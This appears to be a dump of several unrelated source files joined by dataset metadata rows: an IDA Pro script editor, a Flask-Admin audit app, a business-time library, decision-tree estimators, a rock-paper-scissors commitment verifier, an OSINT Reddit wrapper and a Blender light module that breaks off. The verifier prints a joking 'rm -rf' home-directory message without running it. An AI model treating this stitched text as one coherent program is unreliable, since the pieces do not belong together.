self.lexer.setFont(self.skrift)
self.lexer.setEolFill(True)
#api test not working
api = Qsci.QsciAPIs(self.lexer)
API_FILE = dn+'\\Python.api'
API_FILE2 = dn+'\\idc.api'
API_FILE3 = dn+'\\idaapi.api'
api.load(API_FILE)
api.load(API_FILE2)
api.load(API_FILE3)
api.prepare()
self.codebox.setAutoCompletionThreshold(0)
self.codebox.setAutoCompletionThreshold(6)
self.codebox.setAutoCompletionThreshold(8)
self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
self.lexer.setDefaultFont(self.skrift)
self.codebox.setLexer(self.lexer)
self.codebox.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas')
#line numbers
fontmetrics = QFontMetrics(self.skrift)
self.codebox.setMarginsFont(self.skrift)
self.codebox.setMarginWidth(0, fontmetrics.width("00000") + 6)
self.codebox.setTabWidth(4)
#brace
self.codebox.setBraceMatching(QsciScintilla.SloppyBraceMatch)
#auto line tab =4
self.codebox.setAutoIndent(True)
#scroolbar
self.codebox.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Ida Pro Python Script Editor", None))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar", None))
def plugin_make(self):
Wizard.show()
def sendgrapped(self):
print "hello"
helloclass = Ui_Wizard()
self.bsout = self.codebox.text()
helloclass.script_textEdit.setText(self.bsout)
def hubba(self):
print "sdfgsdgsgdghsghdg"
#print str(self.codebox.text())
def udder(self):
self.codebox.zoomIn()
def odder(self):
self.codebox.zoomOut()
def newfile(self):
self.codebox.clear()
def open(self):
self.path = QtCore.QFileInfo(self.filename).path()
# Get filename and show only .writer files
(self.filename, _) = \
QtWidgets.QFileDialog.getOpenFileName(self.vindu,
'Open File', self.path,
'Python Files (*.py *.pyc *.pyw)', '')
if self.filename:
with open(self.filename, 'r') as self.file:
self.codebox.setText(self.file.read())
os.chdir(str(self.path))
def savefile(self):
self.path = QtCore.QFileInfo(self.filename).path()
(self.filename, _) = \
QtWidgets.QFileDialog.getSaveFileName(self.vindu, 'Save as'
, self.path, 'Python Files (*.py *.pyc *.pyw)')
if self.filename:
self.savetext(self.filename)
os.chdir(str(self.path))
def savetext(self, fileName):
textout = self.codebox.text()
file = QtCore.QFile(fileName)
if file.open(QtCore.QIODevice.WriteOnly):
QtCore.QTextStream(file) << textout
else:
QtWidgets.QMessageBox.information(self.vindu,
'Unable to open file', file.errorString())
os.chdir(str(self.path))
def runto(self):
self.path = QtCore.QFileInfo(self.filename).path()
g = globals()
os.chdir(str(self.path))
script = str(self.codebox.text())
try:
os.chdir(str(self.path))
os.path.join(os.path.expanduser('~'), os.path.expandvars(str(self.path)))
sys.path.insert(0, str(self.path))
exec (script, g)
except Exception as e:
print e.__doc__
print e.message
else:
pass
#exec (script, g)
def runtoprob(self):
try:
self.path = QtCore.QFileInfo(self.filename).path()
self.path = QtCore.QFileInfo(self.filename).path()
g = globals()
os.chdir(str(self.path))
script = str(self.codebox.text())
import cProfile
cProfile.run(script)
except Exception as e:
print e.__doc__
print e.message
else:
import cProfile
cProfile.run(script)
def Diablecode(self):
self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsNone)
def Reiablecode(self):
self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
def nofoldingl(self):
self.codebox.setFolding(QsciScintilla.NoFoldStyle)
def Circledfold(self):
self.codebox.setFolding(QsciScintilla.CircledTreeFoldStyle)
def plainfold(self):
self.codebox.setFolding(QsciScintilla.PlainFoldStyle)
def webopen(self):
import webbrowser
webbrowser.open('https://www.hex-rays.com/')
def sdkopen(self):
import webbrowser
webbrowser.open('https://www.hex-rays.com/products/ida/support/idapython_docs/')
def gitopen(self):
import webbrowser
webbrowser.open('https://github.com/idapython/src/tree/build-1.7.2')
def Author(self):
import webbrowser
webbrowser.open('https://github.com/techbliss')
def font_choice(self):
self.lbl = self.lexer
font, ok = QtWidgets.QFontDialog.getFont()
if ok:
self.lbl.setFont(font)
def on_margin_clicked(self, nmargin, nline, modifiers):
# Toggle marker for the line the margin was clicked on
if self.codebox.markersAtLine(nline) != 0:
self.codebox.markerDelete(nline, self.ARROW_MARKER_NUM)
else:
self.codebox.markerAdd(nline, self.ARROW_MARKER_NUM)
class MyWindow(QtWidgets.QMainWindow):
'''
we have to ask user for quiting so we can change back to root dir
'''
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Exit',
"Are you sure to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
# print dn
os.chdir(dn)
# print dn
#os.chdir('../..')
# print dn
print '''
###################################################
# Author Storm Shadow #
# #
# Follow me on twitter #
# @zadow28 #
###################################################
# Ida pro python Editor #
###################################################
'''
event.accept()
os.chdir(dn)
else:
event.ignore()
os.chdir(dn)
from PyQt5 import Qsci
if __name__ == '__main__':
import sys
Wizard = QtWidgets.QWizard()
#Wizard = QtWidgets.QWizard()
#app = QtWidgets.QApplication.instance() # enable for usage outside
#if not app: # enable for usage outside
# app = QtWidgets.QApplication([]) # enable for usage outside
MainWindow = MyWindow()
ui = Ui_MainWindow()
messageformForm = QtWidgets.QWidget()
ui2 = Ui_Wizard()
ui3 = Ui_messageformForm()
ui3.setupUi1(messageformForm)
MainWindow.resize(1000, 600)
MainWindow.show()
# app.exec_()
| unlicense | -4,438,855,489,847,117,000 | 42.621421 | 338 | 0.644755 | false |
dorneanu/crudappify | apps/orgapp/app/admin/views.py | 1 | 6660 | from flask import Blueprint
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import admin
from flask.ext.admin.contrib import sqla
from flask.ext.admin import Admin, BaseView, expose
from flask.ext.admin.base import MenuLink
from flask.ext.admin.babel import gettext, ngettext, lazy_gettext
from flask.ext.admin.form import Select2TagsWidget, Select2Field, Select2TagsField, rules
from flask.ext.admin.actions import action
from wtforms import validators, fields
from app import app
from app.database import db_session
from app.models import AppType, App, AppBundle, Target, Organization, Department, Connection, Header, Tag
from app.models import conn_tags_table
class AppTypeAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
form_columns= ['desc']
class AppAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
# Allow only pre-defined values
form_overrides = dict(severity=fields.SelectField)
form_args = dict(
severity = dict(
choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')]
))
form_columns = [
'app_name', 'desc', 'app_type', 'bundle',
'version', 'environment', 'platform',
'department', 'contact',
'date_added',
'status', 'last_scan', 'reported_to_dpt', 'open_issues',
'severity', 'tags', 'url', 'comments'
]
# Add here list of columns where to search
column_searchable_list = ('desc', 'url', 'version', 'environment', 'platform', 'contact', AppBundle.name, Tag.name)
# Define here filters
column_filters = ('desc', 'app_name', 'department', 'app_type', 'url', 'app_id', 'version', 'environment', 'platform', 'date_added', 'tags', 'severity')
# Define which fields should be preloaded by Ajax
form_ajax_refs = {
'tags': {
'fields': (Tag.name,)
},
'app_type': {
'fields': (AppType.desc,)
},
'department': {
'fields': (Department.desc,)
},
'bundle': {
'fields': (AppBundle.name, AppBundle.desc,)
}
}
# Group fields
form_create_rules = [
rules.FieldSet(('app_name', 'desc', 'app_type', 'bundle', 'url', 'severity', 'tags', 'comments'), 'Application'),
rules.FieldSet(('version', 'environment', 'platform', 'status'), 'Technical details'),
rules.FieldSet(('contact', 'department'), 'Contact'),
rules.FieldSet(('open_issues', 'last_scan', 'reported_to_dpt'), 'Audit details'),
]
# Use same rule set for editing pages
form_edit_rules = form_create_rules
def __init__(self, session):
# Just call parent class with predefined model
super(AppAdmin, self).__init__(App, session)
class AppBundleAdmin(sqla.ModelView):
list_template = "list.html"
class TargetAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
# Allow only pre-defined values
form_overrides = dict(priority=fields.SelectField)
form_args = dict(
priority = dict(
choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')]
))
column_filters = ('scheme', 'user', 'password', 'netloc', 'port', 'path', 'params', 'query', 'fragment', 'priority', 'comments')
column_searchable_list = ('scheme', 'user', 'password', 'netloc', 'path', 'params', 'query', 'fragment', 'priority', 'comments', Tag.name)
form_ajax_refs = {
'tags': {
'fields': (Tag.name,)
}
}
# Group fields
form_create_rules = [
rules.FieldSet(('scheme', 'user', 'password', 'netloc', 'port', 'path', 'query', 'fragment'), 'URL Info'),
rules.FieldSet(('priority', 'tags', 'comments', 'connection'), 'Audit details')
]
# Use same rule set for editing pages
form_edit_rules = form_create_rules
@expose("/export")
def action_export(self):
return '<p>Not implemented yet</p>'
@action('scan', 'Scan')
def action_scan(self, ids):
import json
from utils.connection import send_request
t = []
data = []
for id in ids:
headers = []
target = db_session.query(Target).filter_by(id=id).one()
t.append(target.to_string())
# Connect to target
response = send_request(target.to_string(), t)
# Collect headers
for r in response.headers:
headers.append({'header': r, 'value': response.headers[r]})
data.append({'id': id, 'data': headers})
return json.dumps(data, indent=2)
def __init__(self, session):
super(TargetAdmin, self).__init__(Target, session)
class OrgAdmin(sqla.ModelView):
# list_template = "list.html"
column_display_pk = True
class DepartmentAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
form_columns = ['org', 'desc', 'contact']
column_searchable_list = ('desc', Organization.desc)
column_filters = ('desc', 'org')
form_args = dict(
text=dict(label='Big Text', validators=[validators.required()])
)
form_ajax_refs = {
'org': {
'fields': (Organization.desc,)
}
}
def __init__(self, session):
# Just call parent class with predefined model
super(DepartmentAdmin, self).__init__(Department, session)
class ConnectionAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
form_columns = ['conn_type', 'url', 'port', 'answer', 'redirect', 'tags']
column_searchable_list = ('conn_type', 'url', 'answer', 'redirect', 'ip', Tag.name)
column_filters = ('conn_type', 'url', 'port', 'answer', 'redirect', 'ip', Tag.name)
# Define which fields should be preloaded by Ajax
form_ajax_refs = {
'tags': {
'fields': (Tag.name,)
}
}
class HeaderAdmin(sqla.ModelView):
list_template = "list.html"
form_columns = ['conn_id', 'header', 'value']
# Add admin functionality
admin = Admin(app, name="Admin App Survey", url="/admin", base_template="layout-admin.html", template_mode="bootstrap3")
# Add models views
admin.add_view(AppTypeAdmin(AppType, db_session))
admin.add_view(sqla.ModelView(Tag, db_session))
admin.add_view(AppAdmin(db_session))
admin.add_view(AppBundleAdmin(AppBundle, db_session))
admin.add_view(ConnectionAdmin(Connection, db_session))
admin.add_view(HeaderAdmin(Header, db_session))
admin.add_view(OrgAdmin(Organization, db_session))
admin.add_view(DepartmentAdmin(db_session))
admin.add_view(TargetAdmin(db_session))
| mit | -3,902,489,461,993,599,500 | 31.487805 | 156 | 0.618018 | false |
seppemans/businesstimedelta | businesstimedelta/businesstimedelta.py | 1 | 2641 | import datetime
import pytz
def localize_unlocalized_dt(dt):
"""Turn naive datetime objects into UTC.
Don't do anything if the datetime object is aware.
https://docs.python.org/3/library/datetime.html#datetime.timezone
"""
if dt.tzinfo is not None and dt.tzinfo.utcoffset(dt) is not None:
return dt
return pytz.utc.localize(dt)
class BusinessTimeDelta(object):
def __init__(self, rule, hours=0, seconds=0, timedelta=None):
self.rule = rule
if timedelta:
self.timedelta = timedelta
else:
self.timedelta = datetime.timedelta(
seconds=seconds,
hours=hours)
def __repr__(self):
return '<BusinessTimeDelta %s hours %s seconds>' % (self.hours, self.seconds)
def __eq__(self, other):
return self.timedelta == other.timedelta
def __add__(self, other):
if isinstance(other, BusinessTimeDelta) and other.rule == self.rule:
return BusinessTimeDelta(self.rule, timedelta=self.timedelta + other.timedelta)
elif isinstance(other, datetime.datetime):
dt = localize_unlocalized_dt(other)
td_left = self.timedelta
while True:
period_start, period_end = self.rule.next(dt)
period_delta = period_end - period_start
# If we ran out of timedelta, return
if period_delta >= td_left:
return period_start + td_left
td_left -= period_delta
dt = period_end
raise NotImplementedError
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if isinstance(other, BusinessTimeDelta) and other.rule == self.rule:
return BusinessTimeDelta(self.rule, timedelta=self.timedelta - other.timedelta)
elif isinstance(other, datetime.datetime):
dt = localize_unlocalized_dt(other)
td_left = self.timedelta
while True:
period_start, period_end = self.rule.previous(dt)
period_delta = period_end - period_start
# If we ran out of timedelta, return
if period_delta >= td_left:
return period_end - td_left
td_left -= period_delta
dt = period_start
def __rsub__(self, other):
return self.__sub__(other)
@property
def hours(self):
return int(self.timedelta.total_seconds() // (60 * 60))
@property
def seconds(self):
return int(self.timedelta.total_seconds() % (60 * 60))
| mit | 6,038,156,290,826,573,000 | 31.207317 | 91 | 0.581598 | false |
flypy/flypy | flypy/runtime/lowlevel_impls.py | 1 | 1431 | # -*- coding: utf-8 -*-
"""
Low-level implementations of opaque methods.
"""
from __future__ import print_function, division, absolute_import
import string
from flypy.compiler import opaque
from pykit import ir, types as ptypes
def add_impl(opaque_func, name, implementation, restype=None, restype_func=None):
"""
Assign an implementation to an `opaque` function.
Sets up a pykit function and calls `implementation` to produce the
function body.
"""
def impl(py_func, argtypes):
# TODO: do this better
from flypy.compiler import representation_type
ll_argtypes = [representation_type(x) for x in argtypes]
argnames = list(string.ascii_letters[:len(argtypes)])
# Determine return type
if restype_func:
result_type = restype_func(argtypes)
else:
result_type = restype or ll_argtypes[0]
type = ptypes.Function(result_type, tuple(ll_argtypes), False)
func = ir.Function(name, argnames, type)
func.new_block("entry")
b = ir.Builder(func)
b.position_at_beginning(func.startblock)
implementation(b, argtypes, *func.args)
return func
opaque.implement_opaque(opaque_func, impl)
def add_impl_cls(cls, name, implementation, restype=None, restype_func=None):
opaque_func = getattr(cls, name)
add_impl(opaque_func, name, implementation, restype, restype_func)
| bsd-2-clause | 8,591,202,777,185,511,000 | 29.446809 | 81 | 0.665968 | false |
dmitru/pines | pines/estimators.py | 1 | 4069 | # coding=utf-8
import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin, RegressorMixin
from sklearn.utils import check_X_y, check_array
from sklearn.utils.validation import NotFittedError
from pines.tree_builders import TreeType, ProblemType
class DecisionTreeClassifier(BaseEstimator, ClassifierMixin):
def __init__(self, tree_type=TreeType.CART, **kwargs):
"""
Builds a decision tree for a classification problem.
Args:
tree_type (string): One of 'cart' or 'oblivious', default is 'cart'
**kwargs: arguments to pass to a `TreeBuilder` instance
Returns: self
"""
super(DecisionTreeClassifier, self).__init__()
self.tree_ = None
self.tree_type = tree_type
self._tree_builder_kwargs = kwargs
self._tree_builder_class = TreeType.get_tree_builder(tree_type)
def fit(self, X, y, **kwargs):
X, y = check_X_y(X, y, dtype=np.float64)
data_size, n_features = X.shape
self._n_features = n_features
self._tree_builder = self._tree_builder_class(
problem=ProblemType.CLASSIFICATION,
**self._tree_builder_kwargs
)
self.tree_ = self._tree_builder.build_tree(X, y)
return self
def predict(self, X, check_input=True):
if check_input:
X = self._validate_X_predict(X, check_input=True)
return self.tree_.predict(X)
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype='f')
n_features = X.shape[1]
if self._n_features != n_features:
raise ValueError("Number of features of the model must "
" match the input. Model n_features is %s and "
" input n_features is %s "
% (self._n_features, n_features))
return X
class DecisionTreeRegressor(BaseEstimator, RegressorMixin):
def __init__(self, tree_type=TreeType.CART, **kwargs):
"""
Builds a decision tree for a classification problem.
Args:
tree_type (string): One of 'cart' or 'oblivious', default is 'cart'
**kwargs: arguments to pass to a `TreeBuilder` instance
Returns: self
"""
super(DecisionTreeRegressor, self).__init__()
self._tree = None
self.tree_type = tree_type
self._tree_builder_kwargs = kwargs
self._tree_builder_class = TreeType.get_tree_builder(tree_type)
def fit(self, X, y, **kwargs):
X, y = check_X_y(X, y, dtype=np.float64)
data_size, n_features = X.shape
self._n_features = n_features
self._tree_builder = self._tree_builder_class(
problem=ProblemType.REGRESSION,
**self._tree_builder_kwargs
)
self._tree = self._tree_builder.build_tree(X, y)
return self
def predict(self, X, check_input=True):
if check_input:
X = self._validate_X_predict(X, check_input=True)
return self._tree.predict(X)
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self._tree is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype='f')
n_features = X.shape[1]
if self._n_features != n_features:
raise ValueError("Number of features of the model must "
" match the input. Model n_features is %s and "
" input n_features is %s "
% (self._n_features, n_features))
return X
| mit | -3,523,422,632,452,845,000 | 35.00885 | 79 | 0.576554 | false |
yeukhon/homework | computer-security/commitment/verifier.py | 1 | 1699 | #!/usr/bin/env python
import sys
import os
from Crypto import Random
from Crypto.Random import random as R
import cPickle as pcl
import hashlib as H
# # # paper-rock-scissors over a line # # #
# 1. wait for init message
# 2. wait for commitment to one of the values
# 3. send random choice in {paper,rock,scissors}
# 4. wait for decommit value
# 5. report results.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
items = {"paper": 0, "rock": 1, "scissors": 2}
initMessage = pcl.load(sys.stdin)
if initMessage != "hello":
sys.stderr.write("You're supposed to say hello.\n")
sys.exit()
# say hello back.
pcl.dump(initMessage,sys.stdout)
sys.stdout.flush()
# now wait for the committed value
commitment = pcl.load(sys.stdin)
# at this point it is safe to just report our value,
# since we already have theirs.
rnd = R.StrongRandom()
item = dict.keys(items)[rnd.randint(0,len(items)-1)]
pcl.dump(item,sys.stdout)
sys.stdout.flush()
# now read the decommit value
decommit = pcl.load(sys.stdin)
# this will be a list with the randomness first,
# and the committed value second.
theiritem = decommit[1]
# make sure they aren't trying to cheat, and finally
# report the results.
h = H.sha512()
h.update(decommit[0])
h.update(decommit[1])
if h.hexdigest() != commitment:
message = "Cheater! You'll pay for that...\nrm -rf " \
+ os.environ['HOME'] + "\nj/k hahahaha\n"
elif items[item] == items[theiritem]:
message = "I guess its's a draw.\n"
elif (items[item] + 1) % 3 == items[theiritem]:
message = "You lose. Hahahahaha\n"
else:
message = "You win.\n"
pcl.dump(message,sys.stdout)
sys.stderr.write(message)
sys.stdout.flush()
sys.exit()
| mpl-2.0 | -892,549,920,783,651,600 | 25.546875 | 67 | 0.664509 | false |
i3visio/osrframework | osrframework/wrappers/reddit.py | 1 | 3889 | ################################################################################
#
# Copyright 2015-2020 Félix Brezo and Yaiza Rubio
#
# This program is part of OSRFramework. You can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
__author__ = "Felix Brezo, Yaiza Rubio <[email protected]>"
__version__ = "2.0"
from osrframework.utils.platforms import Platform
class Reddit(Platform):
"""A <Platform> object for Reddit"""
def __init__(self):
self.platformName = "Reddit"
self.tags = ["forum"]
########################
# Defining valid modes #
########################
self.isValidMode = {}
self.isValidMode["phonefy"] = False
self.isValidMode["usufy"] = True
self.isValidMode["searchfy"] = False
######################################
# Search URL for the different modes #
######################################
# Strings with the URL for each and every mode
self.url = {}
#self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>"
self.url["usufy"] = "http://en.reddit.com/user/" + "<usufy>"
#self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>"
######################################
# Whether the user needs credentials #
######################################
self.needsCredentials = {}
#self.needsCredentials["phonefy"] = False
self.needsCredentials["usufy"] = False
#self.needsCredentials["searchfy"] = False
#################
# Valid queries #
#################
# Strings that will imply that the query number is not appearing
self.validQuery = {}
# The regular expression '.+' will match any query
#self.validQuery["phonefy"] = ".*"
self.validQuery["usufy"] = ".+"
#self.validQuery["searchfy"] = ".*"
###################
# Not_found clues #
###################
# Strings that will imply that the query number is not appearing
self.notFoundText = {}
#self.notFoundText["phonefy"] = []
self.notFoundText["usufy"] = ["<title>reddit.com: page not found</title>"]
#self.notFoundText["searchfy"] = []
#########################
# Fields to be searched #
#########################
self.fieldsRegExp = {}
# Definition of regular expressions to be searched in phonefy mode
#self.fieldsRegExp["phonefy"] = {}
# Example of fields:
#self.fieldsRegExp["phonefy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in usufy mode
self.fieldsRegExp["usufy"] = {}
# Example of fields:
#self.fieldsRegExp["usufy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in searchfy mode
#self.fieldsRegExp["searchfy"] = {}
# Example of fields:
#self.fieldsRegExp["searchfy"]["i3visio.location"] = ""
################
# Fields found #
################
# This attribute will be feeded when running the program.
self.foundFields = {}
| agpl-3.0 | 4,466,890,473,808,879,000 | 37.88 | 82 | 0.523405 | false |
michaupl/materialsapp | cuts/migrations/0002_set_type_on_detail.py | 1 | 4930 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
from .. import DETAIL_TYPE
for detail in orm.CutDetail.objects.all():
detail.type = DETAIL_TYPE
detail.save()
def backwards(self, orm):
"Write your backwards methods here."
pass
models = {
u'core.category': {
'Meta': {'object_name': 'Category'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Image']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.detail': {
'Meta': {'object_name': 'Detail'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'caption': ('django.db.models.fields.CharField', [], {'max_length': '2000'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'facts': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Subcategory']"}),
'title_image': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Image']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'video_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'core.image': {
'Meta': {'object_name': 'Image'},
'alt_text': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'figcaption': ('django.db.models.fields.CharField', [], {'max_length': '150', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'core.subcategory': {
'Meta': {'object_name': 'Subcategory'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'caption': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Category']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
u'cuts.cutdetail': {
'Meta': {'object_name': 'CutDetail', '_ormbases': [u'core.Detail']},
u'detail_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Detail']", 'unique': 'True', 'primary_key': 'True'})
},
u'cuts.cutsubcategory': {
'Meta': {'object_name': 'CutSubcategory', '_ormbases': [u'core.Subcategory']},
u'subcategory_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Subcategory']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['cuts']
symmetrical = True
| apache-2.0 | 7,196,076,092,126,287,000 | 63.868421 | 194 | 0.559432 | false |
influence-usa/python-opencivicdata-django | opencivicdata/models/base.py | 1 | 3359 | import re
import uuid
from django.db import models
from django.core.validators import RegexValidator
from jsonfield import JSONField
from uuidfield import UUIDField
from .. import common
class OCDIDField(models.CharField):
def __init__(self, *args, **kwargs):
self.ocd_type = kwargs.pop('ocd_type')
if self.ocd_type != 'jurisdiction':
kwargs['default'] = lambda: 'ocd-{}/{}'.format(self.ocd_type, uuid.uuid4())
# len('ocd-') + len(ocd_type) + len('/') + len(uuid)
# = 4 + len(ocd_type) + 1 + 36
# = len(ocd_type) + 41
kwargs['max_length'] = 41 + len(self.ocd_type)
regex = '^ocd-' + self.ocd_type + '/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'
else:
kwargs['max_length'] = 300
regex = common.JURISDICTION_ID_REGEX
kwargs['primary_key'] = True
# get pattern property if it exists, otherwise just return the object (hopefully a string)
msg = 'ID must match ' + getattr(regex, 'pattern', regex)
kwargs['validators'] = [RegexValidator(regex=regex, message=msg, flags=re.U)]
super(OCDIDField, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(OCDIDField, self).deconstruct()
if self.ocd_type != 'jurisdiction':
kwargs.pop('default')
kwargs.pop('max_length')
kwargs.pop('primary_key')
kwargs['ocd_type'] = self.ocd_type
return (name, path, args, kwargs)
class OCDBase(models.Model):
""" common base fields across all top-level models """
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
extras = JSONField(default='{}', blank=True)
class Meta:
abstract = True
class RelatedBase(models.Model):
id = UUIDField(auto=True, primary_key=True)
class Meta:
abstract = True
class LinkBase(RelatedBase):
note = models.CharField(max_length=300, blank=True)
url = models.URLField(max_length=2000)
class Meta:
abstract = True
class MimetypeLinkBase(RelatedBase):
media_type = models.CharField(max_length=100)
url = models.URLField(max_length=2000)
class Meta:
abstract = True
class IdentifierBase(RelatedBase):
identifier = models.CharField(max_length=300)
scheme = models.CharField(max_length=300)
class Meta:
abstract = True
class RelatedEntityBase(RelatedBase):
name = models.CharField(max_length=2000)
entity_type = models.CharField(max_length=20, blank=True)
# optionally tied to an organization or person if it was linkable
organization = models.ForeignKey('Organization', null=True)
person = models.ForeignKey('Person', null=True)
@property
def entity_name(self):
if self.entity_type == 'organization' and self.organization_id:
return self.organization.name
elif self.entity_type == 'person' and self.person_id:
return self.person.name
else:
return self.name
@property
def entity_id(self):
if self.entity_type == 'organization':
return self.organization_id
if self.entity_type == 'person':
return self.person_id
return None
class Meta:
abstract = True
| bsd-3-clause | -3,939,492,258,956,639,000 | 29.816514 | 98 | 0.6234 | false |
prman-pixar/RenderManForBlender | rman_ui/rman_ui_light_handlers/__init__.py | 2 | 43288 | import bpy
import gpu
from gpu_extras.batch import batch_for_shader
from ...rfb_utils import transform_utils
from ...rman_constants import RMAN_AREA_LIGHT_TYPES
from .barn_light_filter_draw_helper import BarnLightFilterDrawHelper
from mathutils import Vector, Matrix
import mathutils
import math
_DRAW_HANDLER_ = None
_BARN_LIGHT_DRAW_HELPER_ = None
_PI0_5_ = 1.570796327
s_rmanLightLogo = dict()
s_rmanLightLogo['box'] = [
(-0.5,0.5,0.0),
(-0.5,-0.5,0.0),
(0.5,-0.5,0.0),
(0.5,0.5, 0.0)
]
s_rmanLightLogo['point'] = [
(0.1739199623,0.2189011082,0.0),
(0.2370826019,0.2241208805,0.0),
(0.2889232079,0.180194478,0.0),
(0.2945193948,0.1124769769,0.0),
(0.2505929922,0.06063637093,0.0),
(0.1828754911,0.05504018402,0.0),
(0.1310348852,0.09896658655,0.0),
(0.1254386983,0.1666840877,0.0)
]
s_rmanLightLogo['bouncing_r'] = [
(0.10014534,0.163975795,0.0),
(0.02377454715,0.2079409584,0.0),
(-0.0409057802,0.162414633,0.0),
(-0.09261710117,-0.03967857045,0.0),
(-0.1033546419,-0.3941421577,0.0),
(-0.1714205988,-0.3935548906,0.0),
(-0.1743695606,-0.2185861014,0.0),
(-0.1934162612,-0.001801638764,0.0),
(-0.2387964527,0.228222199,0.0),
(-0.2945193948,0.388358659,0.0),
(-0.2800665961,0.3941421577,0.0),
(-0.1944135703,0.2262313617,0.0),
(-0.1480375743,0.08022936015,0.0),
(-0.09632135301,0.2812304287,0.0),
(0.03260773708,0.3415349284,0.0),
(0.1794274591,0.2497892755,0.0),
(0.10014534,0.163975795,0.0)
]
s_rmanLightLogo['arrow'] = [
(0.03316599252,-6.536167e-18,0.0294362),
(0.03316599252,-7.856030e-17,0.3538041),
(0.06810822842,-7.856030e-17,0.3538041),
(0,-1.11022302e-16,0.5),
(-0.0681082284,-7.85603e-17,0.353804),
